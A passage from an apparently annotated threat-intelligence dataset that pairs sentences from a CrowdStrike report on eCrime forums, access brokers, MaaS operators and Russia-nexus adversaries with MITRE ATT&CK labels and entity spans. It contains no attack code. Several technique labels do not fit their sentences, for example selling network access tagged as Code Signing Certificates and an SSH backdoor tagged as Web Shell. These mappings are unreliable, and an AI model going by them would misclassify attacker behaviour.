"crowdstrike-42_crowdstrike_report-p13-s73-397a3c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 73, "context_before": "Vendors also offer tutorials, initial access broker listings, and laundering services that enable threat actors to monetize their operations.", "sentence_text": "ShinyHunters is likely based in France, as corroborated by a June 2021 U.S.\nDepartment of Justice (DOJ) indictment of several France-based individuals associated with the group.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p13-s74-64baf0", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 74, "context_before": "ShinyHunters is likely based in France, as corroborated by a June 2021 U.S.\nDepartment of Justice (DOJ) indictment of several France-based individuals associated with the group.", "sentence_text": "The forum’s leadership underwent several transitions until the U.K.-based adversary BUTLER SPIDER (aka IntelBroker) became the primary owner and administrator in August 2024.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p13-s75-0ff57f", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 75, "context_before": "The forum’s leadership underwent several transitions until the U.K.-based adversary BUTLER SPIDER (aka IntelBroker) became the primary owner and administrator in August 2024.", "sentence_text": "BUTLER SPIDER was a prominent forum member and claimed responsibility for selling and exposing sensitive U.S. and European government data.", "relevant": "yes", "tactic": [ { "id": "TA0009", "name": "Collection" } ], "techniques": [ { "id": "T1530", "name": "Data from Cloud Storage" } ], "procedure": "sell and expose sensitive government data", "entities": [ { "text": "BUTLER SPIDER", "start": 0, "end": 13, "label": "ThreatActor" }, { "text": "selling", "start": 74, "end": 81, "label": "Action" }, { "text": " exposing ", "start": 85, "end": 95, "label": "Action" }, { "text": " U.S. and European government data", "start": 104, "end": 138, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p13-s76-50fe6c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 76, "context_before": "BUTLER SPIDER was a prominent forum member and claimed responsibility for selling and exposing sensitive U.S. and European government data.", "sentence_text": "In February 2025, French authorities reportedly arrested BUTLER SPIDER.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p13-s77-edb4a9", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 77, "context_before": "In February 2025, French authorities reportedly arrested BUTLER SPIDER.", "sentence_text": "Their inactivity since March 2025 led other forum members to speculate whether the adversary had been arrested.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p13-s78-f9d554", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 78, "context_before": "Their inactivity since March 2025 led other forum members to speculate whether the adversary had been arrested.", "sentence_text": "In April 2025, the forum went offline, though the administrators at the time claimed they had intentionally taken the forum down because it had been targeted with a zero-day exploit.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1190", "name": "Exploit Public-Facing Application" } ], "procedure": "forum targeted with zero-day exploit", "entities": [ { "text": "forum", "start": 19, "end": 24, "label": "Infrastructure_Indicator" }, { "text": " target", "start": 148, "end": 155, "label": "Action" }, { "text": " zero-day exploit", "start": 164, "end": 181, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p13-s79-95c6be", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 13, "sentence_id": 79, "context_before": "In April 2025, the forum went offline, though the administrators at the time claimed they had intentionally taken the forum down because it had been targeted with a zero-day exploit.", "sentence_text": "The tumultuous history of BreachForums demonstrates how individual threat actors can significantly shape forum activity while drawing international law enforcement scrutiny.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s80-eff3bc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 80, "context_before": "The tumultuous history of BreachForums demonstrates how individual threat actors can significantly shape forum activity while drawing international law enforcement scrutiny.", "sentence_text": "INITIAL ACCESS BROKERS Initial access brokers (IABs) are threat actors that gain and sell access to corporate networks on forums and marketplaces.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.003", "name": "Code Signing Certificates" } ], "procedure": "gain and sell access to corporate networks", "entities": [ { "text": "threat actors", "start": 57, "end": 70, "label": "ThreatActor" }, { "text": "INITIAL ACCESS BROKERS", "start": 0, "end": 22, "label": "ThreatActor" }, { "text": " Initial access brokers (IABs) ", "start": 22, "end": 53, "label": "ThreatActor" }, { "text": " gain ", "start": 75, "end": 81, "label": "Action" }, { "text": "sell access", "start": 85, "end": 96, "label": "Action" }, { "text": "corporate networks", "start": 100, "end": 118, "label": "Infrastructure_Indicator" }, { "text": " forums ", "start": 121, "end": 129, "label": "Infrastructure_Indicator" }, { "text": " marketplaces", "start": 132, "end": 145, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s81-340ba4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 81, "context_before": "INITIAL ACCESS BROKERS Initial access brokers (IABs) are threat actors that gain and sell access to corporate networks on forums and marketplaces.", "sentence_text": "IABs use various TTPs to gain initial access, including abusing compromised credentials, exploiting vulnerabilities, and leveraging social engineering.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1078", "name": "Valid Accounts" } ], "procedure": "abuse compromised credentials, exploit vulnerabilities, leverage social engineering", "entities": [ { "text": "gain initial access", "start": 25, "end": 44, "label": "Action" }, { "text": "abusing", "start": 56, "end": 63, "label": "Action" }, { "text": "exploiting ", "start": 89, "end": 100, "label": "Action" }, { "text": " leveraging ", "start": 120, "end": 132, "label": "Action" }, { "text": "IABs", "start": 0, "end": 4, "label": "ThreatActor" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s82-aed90e", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 82, "context_before": "IABs use various TTPs to gain initial access, including abusing compromised credentials, exploiting vulnerabilities, and leveraging social engineering.", "sentence_text": "Europe-based entities are a popular target among IABs and their buyers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s83-45e9d6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 83, "context_before": "Europe-based entities are a popular target among IABs and their buyers.", "sentence_text": "EUROPE-BASED ENTITIES.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s84-101aa6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 84, "context_before": "EUROPE-BASED ENTITIES.", "sentence_text": "Based on this dataset, IABs’ most advertised countries and sectors broadly coincide with those named on BGH DLSs (see the BigGameHunting section on page 5).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "advertise countries and sectors on DLSs", "entities": [ { "text": " IABs", "start": 22, "end": 27, "label": "ThreatActor" }, { "text": "advertised ", "start": 34, "end": 45, "label": "Action" }, { "text": " countries", "start": 44, "end": 54, "label": "Infrastructure_Indicator" }, { "text": "sectors ", "start": 59, "end": 67, "label": "Infrastructure_Indicator" }, { "text": " BGH DLSs", "start": 103, "end": 112, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s85-3463bf", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 85, "context_before": "Based on this dataset, IABs’ most advertised countries and sectors broadly coincide with those named on BGH DLSs (see the BigGameHunting section on page 5).", "sentence_text": "This is likely due to multiple factors, one of which is the close collaboration between IABs and BGH adversaries.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p14-s86-a174bc", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 14, "sentence_id": 86, "context_before": "This is likely due to multiple factors, one of which is the close collaboration between IABs and BGH adversaries.", "sentence_text": "For example, HOOK SPIDER — which has operated under several monikers on the Russian-language eCrime forums Exploit, RAMP, and XSS — has highly likely sold access to several BGH adversaries (including BITWISE SPIDER and BRAIN SPIDER) and is historically associated with SCATTERED SPIDER.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583.001", "name": "Domains" } ], "procedure": "sell access to BGH adversaries; operate on multiple forums", "entities": [ { "text": "HOOK SPIDER", "start": 13, "end": 24, "label": "ThreatActor" }, { "text": "Russian-language eCrime forums Exploit", "start": 76, "end": 114, "label": "Infrastructure_Indicator" }, { "text": "RAMP", "start": 116, "end": 120, "label": "Infrastructure_Indicator" }, { "text": " XSS", "start": 125, "end": 129, "label": "Infrastructure_Indicator" }, { "text": " sold", "start": 149, "end": 154, "label": "Action" }, { "text": " BGH adversaries ", "start": 172, "end": 189, "label": "ThreatActor" }, { "text": "BITWISE SPIDER ", "start": 200, "end": 215, "label": "ThreatActor" }, { "text": " BRAIN SPIDER", "start": 218, "end": 231, "label": "ThreatActor" }, { "text": "SCATTERED SPIDER", "start": 269, "end": 285, "label": "ThreatActor" }, { "text": "associated", "start": 253, "end": 263, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p15-s87-0a1495", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 15, "sentence_id": 87, "context_before": "For example, HOOK SPIDER — which has operated under several monikers on the Russian-language eCrime forums Exploit, RAMP, and XSS — has highly likely sold access to several BGH adversaries (including BITWISE SPIDER and BRAIN SPIDER) and is historically associated with SCATTERED SPIDER.", "sentence_text": "The MaaS model makes it significantly easier for eCrime threat actors to access tools they would otherwise lack the time or resources to develop.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "use MaaS model to access tools", "entities": [ { "text": " eCrime threat actors", "start": 48, "end": 69, "label": "ThreatActor" }, { "text": " access", "start": 72, "end": 79, "label": "Action" }, { "text": " tools", "start": 79, "end": 85, "label": "MalwareTool" }, { "text": "MaaS model ", "start": 4, "end": 15, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p15-s88-cad772", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 15, "sentence_id": 88, "context_before": "The MaaS model makes it significantly easier for eCrime threat actors to access tools they would otherwise lack the time or resources to develop.", "sentence_text": "Russian-speaking MaaS operators typically offer their services on eCrime forums (notably Exploit), public or private Telegram channels, and — in the case of LUNAR SPIDER — on a referral basis.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "offer MaaS services on forums, Telegram, and via referrals", "entities": [ { "text": "eCrime forums", "start": 66, "end": 79, "label": "Infrastructure_Indicator" }, { "text": " Exploit", "start": 88, "end": 96, "label": "Infrastructure_Indicator" }, { "text": "Russian-speaking MaaS operators", "start": 0, "end": 31, "label": "ThreatActor" }, { "text": ", public or private Telegram channels", "start": 97, "end": 134, "label": "Infrastructure_Indicator" }, { "text": " LUNAR SPIDER", "start": 156, "end": 169, "label": "ThreatActor" }, { "text": "offer", "start": 42, "end": 47, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p15-s89-ce7639", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 15, "sentence_id": 89, "context_before": "Russian-speaking MaaS operators typically offer their services on eCrime forums (notably Exploit), public or private Telegram channels, and — in the case of LUNAR SPIDER — on a referral basis.", "sentence_text": "While law enforcement operations such as Operation Endgame or the July 2025 XSS seizure regularly disrupt the ecosystem, MaaS operators remain resilient partially due to the persistence of long-standing members that act with near impunity in their jurisdictions.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s90-e6f2fa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 90, "context_before": "While law enforcement operations such as Operation Endgame or the July 2025 XSS seizure regularly disrupt the ecosystem, MaaS operators remain resilient partially due to the persistence of long-standing members that act with near impunity in their jurisdictions.", "sentence_text": "MaaS operators supplied multiple threat actors with the same malware tools and delivery TTPs, complicating attribution.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": null, "procedure": "Supply multiple threat actors with the same malware tools and delivery TTPs.", "entities": [ { "text": "MaaS operators", "start": 0, "end": 14, "label": "ThreatActor" }, { "text": "supplied multiple threat actors with the same malware tools and delivery TTPs", "start": 15, "end": 92, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s91-d9a80a", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 91, "context_before": "MaaS operators supplied multiple threat actors with the same malware tools and delivery TTPs, complicating attribution.", "sentence_text": "Nation-state adversaries exploit this model, such as Russia-nexus adversary EMBER BEAR, which has leveraged DEMON SPIDER’s Matanbuchus, SMOKY SPIDER’s SmokeLoader, and RaccoonStealer.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "exploit MaaS model; leverage malware loaders and stealers", "entities": [ { "text": "Nation-state adversaries", "start": 0, "end": 24, "label": "ThreatActor" }, { "text": "exploit", "start": 25, "end": 32, "label": "Action" }, { "text": " Russia-nexus adversary ", "start": 52, "end": 76, "label": "ThreatActor" }, { "text": "EMBER BEAR", "start": 76, "end": 86, "label": "ThreatActor" }, { "text": "leveraged ", "start": 98, "end": 108, "label": "Action" }, { "text": " DEMON SPIDER", "start": 107, "end": 120, "label": "ThreatActor" }, { "text": " Matanbuchus", "start": 122, "end": 134, "label": "MalwareTool" }, { "text": "SMOKY SPIDER", "start": 136, "end": 148, "label": "ThreatActor" }, { "text": "SmokeLoader", "start": 151, "end": 162, "label": "MalwareTool" }, { "text": "RaccoonStealer", "start": 168, "end": 182, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s92-9d34f4", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 92, "context_before": "Nation-state adversaries exploit this model, such as Russia-nexus adversary EMBER BEAR, which has leveraged DEMON SPIDER’s Matanbuchus, SMOKY SPIDER’s SmokeLoader, and RaccoonStealer.", "sentence_text": "While channel takedowns increased after Telegram CEO Pavel Durov was arrested in August 2024 and Telegram’s terms of service were updated, eCrime threat actors largely continue to rely on Telegram as a primary communication platform.", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "Continue to rely on Telegram as a primary communication platform despite increased channel takedowns.", "entities": [ { "text": "eCrime threat actors", "start": 139, "end": 159, "label": "ThreatActor" }, { "text": "continue to rely on Telegram as a primary communication platform", "start": 168, "end": 232, "label": "Action" }, { "text": "Telegram", "start": 188, "end": 196, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s93-b01f45", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 93, "context_before": "While channel takedowns increased after Telegram CEO Pavel Durov was arrested in August 2024 and Telegram’s terms of service were updated, eCrime threat actors largely continue to rely on Telegram as a primary communication platform.", "sentence_text": "Telegram allows eCrime services to communicate updates or service outages as well as offer direct support to customers.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Use Telegram to communicate service updates and outages and provide customer support.", "entities": [ { "text": "communicate updates or service outages", "start": 35, "end": 73, "label": "Action" }, { "text": "offer direct support to customers", "start": 85, "end": 118, "label": "Action" }, { "text": "Telegram", "start": 0, "end": 8, "label": "Infrastructure_Indicator" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s94-c14eed", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 94, "context_before": "Telegram allows eCrime services to communicate updates or service outages as well as offer direct support to customers.", "sentence_text": "eCrime services used Tox and Jabber to communicate with customers and provide operational support.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "Use Tox and Jabber to communicate with customers and provide operational support.", "entities": [ { "text": "eCrime services", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "used Tox and Jabber", "start": 16, "end": 35, "label": "Action" }, { "text": "Tox", "start": 21, "end": 24, "label": "Infrastructure_Indicator" }, { "text": "Jabber", "start": 29, "end": 35, "label": "Infrastructure_Indicator" }, { "text": "communicate with customers", "start": 39, "end": 65, "label": "Action" }, { "text": "provide operational support", "start": 70, "end": 97, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s95-b96328", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 95, "context_before": "eCrime services used Tox and Jabber to communicate with customers and provide operational support.", "sentence_text": "Tox messages are immutable, preventing customers from changing agreements after a sale.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s96-fcb2df", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 96, "context_before": "Tox messages are immutable, preventing customers from changing agreements after a sale.", "sentence_text": "Several of these individuals have previously advertised tools such as one-time password interception bots, which are Telegram-based tools that enable threat actors to automate vishing calls to victims and are often used to target cryptocurrency exchange accounts.", "relevant": "yes", "tactic": [ { "id": "TA0006", "name": "Credential Access" } ], "techniques": [ { "id": "T1111", "name": "Multi-Factor Authentication Interception" } ], "procedure": "advertise and use OTP interception bots to automate vishing calls targeting cryptocurrency accounts", "entities": [ { "text": "advertised", "start": 45, "end": 55, "label": "Action" }, { "text": "tools", "start": 56, "end": 61, "label": "MalwareTool" }, { "text": "one-time password interception bots", "start": 70, "end": 105, "label": "MalwareTool" }, { "text": "Telegram", "start": 117, "end": 125, "label": "Infrastructure_Indicator" }, { "text": "threat actors", "start": 150, "end": 163, "label": "ThreatActor" }, { "text": " automate", "start": 166, "end": 175, "label": "Action" }, { "text": "vishing calls", "start": 176, "end": 189, "label": "Action" }, { "text": "target ", "start": 223, "end": 230, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p16-s97-d274d5", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 16, "sentence_id": 97, "context_before": "Several of these individuals have previously advertised tools such as one-time password interception bots, which are Telegram-based tools that enable threat actors to automate vishing calls to victims and are often used to target cryptocurrency exchange accounts.", "sentence_text": "10 https://www.crowdstrike.com/en-us/blog/crowdstrike-partners-with-doj-disrupt-danabot-malware-operators/\n11 https://www.france24.com/en/france/20250621-france-arrests-five-kidnapping-cryptocurrency-entrepreneur-father\n12 https://github.com/jlopp/physical-bitcoin-attacks", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p17-s98-17437c", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 17, "sentence_id": 98, "context_before": "10 https://www.crowdstrike.com/en-us/blog/crowdstrike-partners-with-doj-disrupt-danabot-malware-operators/\n11 https://www.france24.com/en/france/20250621-france-arrests-five-kidnapping-cryptocurrency-entrepreneur-father\n12 https://github.com/jlopp/physical-bitcoin-attacks", "sentence_text": "• RENAISSANCE SPIDER conducts high-volume phishing campaigns primarily targeting Ukraine’s public and private sectors.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566", "name": "Phishing" } ], "procedure": "conduct high-volume phishing campaigns targeting Ukraine's public and private sectors", "entities": [ { "text": "RENAISSANCE SPIDER ", "start": 2, "end": 21, "label": "ThreatActor" }, { "text": " phishing", "start": 41, "end": 50, "label": "Action" }, { "text": "targeting", "start": 71, "end": 80, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p17-s99-791615", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 17, "sentence_id": 99, "context_before": "• RENAISSANCE SPIDER conducts high-volume phishing campaigns primarily targeting Ukraine’s public and private sectors.", "sentence_text": "The adversary is likely motivated by both financial gain and intelligence gathering.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p17-s100-ffa071", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 17, "sentence_id": 100, "context_before": "The adversary is likely motivated by both financial gain and intelligence gathering.", "sentence_text": "• RENAISSANCE SPIDER has targeted entities across Europe in email- and social media-based IO using various personas, including the fake hacktivist DaVinciGroup, or impersonating real Moldovan journalists by using their compromised email accounts.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1036.005", "name": "Match Legitimate Resource Name or Location" } ], "procedure": "target European entities using email/social media IO, fake personas, and impersonation of journalists via compromised accounts", "entities": [ { "text": "RENAISSANCE SPIDER", "start": 2, "end": 20, "label": "ThreatActor" }, { "text": "targeted ", "start": 25, "end": 34, "label": "Action" }, { "text": " hacktivist DaVinciGroup", "start": 135, "end": 159, "label": "ThreatActor" }, { "text": "impersonating", "start": 164, "end": 177, "label": "Action" }, { "text": "compromised email accounts", "start": 219, "end": 245, "label": "Infrastructure_Indicator" }, { "text": "email- and social media-based IO", "start": 60, "end": 92, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p17-s101-1918d7", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 17, "sentence_id": 101, "context_before": "• RENAISSANCE SPIDER has targeted entities across Europe in email- and social media-based IO using various personas, including the fake hacktivist DaVinciGroup, or impersonating real Moldovan journalists by using their compromised email accounts.", "sentence_text": "Meanwhile, a broad spectrum of state-sponsored cyber activity persists.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p17-s102-4eeea3", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 17, "sentence_id": 102, "context_before": "Meanwhile, a broad spectrum of state-sponsored cyber activity persists.", "sentence_text": "These campaigns range from targeted intrusions for traditional espionage — aimed at obtaining geopolitical and operational insight or facilitating intellectual property theft — to opportunistic intrusions for financial gain.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p18-s103-6e8376", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 18, "sentence_id": 103, "context_before": "These campaigns range from targeted intrusions for traditional espionage — aimed at obtaining geopolitical and operational insight or facilitating intellectual property theft — to opportunistic intrusions for financial gain.", "sentence_text": "Conflict-Driven Cyber Activity RUSSIA-ALIGNED CONFLICTS Russia's full-scale invasion of Ukraine in February 2022 triggered a surge in targeted cyber intrusions from a mix of new and established threat actors.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p18-s104-32ab34", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 18, "sentence_id": 104, "context_before": "Conflict-Driven Cyber Activity RUSSIA-ALIGNED CONFLICTS Russia's full-scale invasion of Ukraine in February 2022 triggered a surge in targeted cyber intrusions from a mix of new and established threat actors.", "sentence_text": "Each adversary’s distinct intelligence mandates collectively form a broad intelligence-gathering campaign supporting various strategic objectives.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p18-s105-e0364b", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 18, "sentence_id": 105, "context_before": "Each adversary’s distinct intelligence mandates collectively form a broad intelligence-gathering campaign supporting various strategic objectives.", "sentence_text": "Though most intelligence collection activity related to the conflict is conducted by Russian Intelligence Services (RIS) — primarily the GRU (aka GU, Main Directorate of the General Staff of the Armed Forces of the Russian Federation) and Federal Security Service of the Russian Federation (FSB) — the DPRK’s intelligence agencies have also been involved in kinetic and cyber operations targeting Ukraine.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p19-s106-0238aa", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 19, "sentence_id": 106, "context_before": "Though most intelligence collection activity related to the conflict is conducted by Russian Intelligence Services (RIS) — primarily the GRU (aka GU, Main Directorate of the General Staff of the Armed Forces of the Russian Federation) and Federal Security Service of the Russian Federation (FSB) — the DPRK’s intelligence agencies have also been involved in kinetic and cyber operations targeting Ukraine.", "sentence_text": "GRU-Nexus Adversaries Conduct Intelligence Collection and Disruptive Operations GRU-operated adversary FANCY BEAR has conducted numerous simultaneous campaigns targeting Ukrainian military and government entities.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p19-s107-576648", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 19, "sentence_id": 107, "context_before": "GRU-Nexus Adversaries Conduct Intelligence Collection and Disruptive Operations GRU-operated adversary FANCY BEAR has conducted numerous simultaneous campaigns targeting Ukrainian military and government entities.", "sentence_text": "Though the adversary has used their custom credential phishing toolkit for their phishing operations targeting users of the free Ukrainian webmail service ukr.net since 2023, they have also leveraged ClickFix, malicious RDP files, and open-source large language model capabilities in their campaigns.", "relevant": "yes", "tactic": [ { "id": "TA0001", "name": "Initial Access" } ], "techniques": [ { "id": "T1566.001", "name": "Spearphishing Attachment" } ], "procedure": "use credential phishing toolkit, ClickFix, malicious RDP files, and LLM capabilities in campaigns", "entities": [ { "text": " the adversary", "start": 6, "end": 20, "label": "ThreatActor" }, { "text": "used", "start": 25, "end": 29, "label": "Action" }, { "text": "phishing", "start": 81, "end": 89, "label": "Action" }, { "text": " targeting", "start": 100, "end": 110, "label": "Action" }, { "text": " leveraged", "start": 189, "end": 199, "label": "Action" }, { "text": "ClickFix", "start": 200, "end": 208, "label": "MalwareTool" }, { "text": " malicious RDP files", "start": 209, "end": 229, "label": "MalwareTool" }, { "text": "credential phishing toolkit", "start": 43, "end": 70, "label": "MalwareTool" }, { "text": "ukr.net", "start": 155, "end": 162, "label": "Infrastructure_Indicator" }, { "text": "open-source large language model capabilities", "start": 235, "end": 280, "label": "MalwareTool" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p19-s108-a723a6", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 19, "sentence_id": 108, "context_before": "Though the adversary has used their custom credential phishing toolkit for their phishing operations targeting users of the free Ukrainian webmail service ukr.net since 2023, they have also leveraged ClickFix, malicious RDP files, and open-source large language model capabilities in their campaigns.", "sentence_text": "FANCY BEAR’s intelligence collection focuses on supporting Russia’s military objectives in Ukraine on strategic, operational, and tactical levels.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "crowdstrike-42_crowdstrike_report-p19-s109-388a73", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 19, "sentence_id": 109, "context_before": "FANCY BEAR’s intelligence collection focuses on supporting Russia’s military objectives in Ukraine on strategic, operational, and tactical levels.", "sentence_text": "During instances in which they did not immediately deploy wiper malware, VOODOO BEAR likely maintained their access to move laterally and further compromise networks in support of their intelligence collection and destructive operation requirements.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1021.001", "name": "Remote Desktop Protocol" } ], "procedure": "maintain access, move laterally, and compromise networks; deploy wiper malware", "entities": [ { "text": "VOODOO BEAR ", "start": 73, "end": 85, "label": "ThreatActor" }, { "text": " maintained their access", "start": 91, "end": 115, "label": "Action" }, { "text": "move laterally", "start": 119, "end": 133, "label": "Action" }, { "text": "compromise networks", "start": 146, "end": 165, "label": "Action" }, { "text": "wiper malware", "start": 58, "end": 71, "label": "MalwareTool" }, { "text": "intelligence collection", "start": 186, "end": 209, "label": "Action" }, { "text": "destructive operation", "start": 214, "end": 235, "label": "Action" } ] }, { "uid": "crowdstrike-42_crowdstrike_report-p19-s110-b2b304", "source": "crowdstrike", "doc_id": "42_crowdstrike_report", "page_number": 19, "sentence_id": 110, "context_before": "During instances in which they did not immediately deploy wiper malware, VOODOO BEAR likely maintained their access to move laterally and further compromise networks in support of their intelligence collection and destructive operation requirements.", "sentence_text": "In early 2025, CrowdStrike OverWatch detected VOODOO BEAR leveraging the POEMGATE secure shell (SSH) backdoor and credential logger in the environments of Ukrainian telecommunications entities.", "relevant": "yes", "tactic": [ { "id": "TA0003", "name": "Persistence" } ], "techniques": [ { "id": "T1505.003", "name": "Web Shell" } ], "procedure": "leverage POEMGATE SSH backdoor and credential logger", "entities": [ { "text": "VOODOO BEAR", "start": 46, "end": 57, "label": "ThreatActor" }, { "text": " leveraging", "start": 57, "end": 68, "label": "Action" }, { "text": "POEMGATE secure shell (SSH) backdoor", "start": 73, "end": 109, "label": "MalwareTool" }, { "text": " credential logger", "start": 113, "end": 131, "label": "MalwareTool" }, { "text": " environments of Ukrainian telecommunications entities", "start": 138, "end": 192, "label": "Infrastructure_Indicator" } ] }, { "uid": 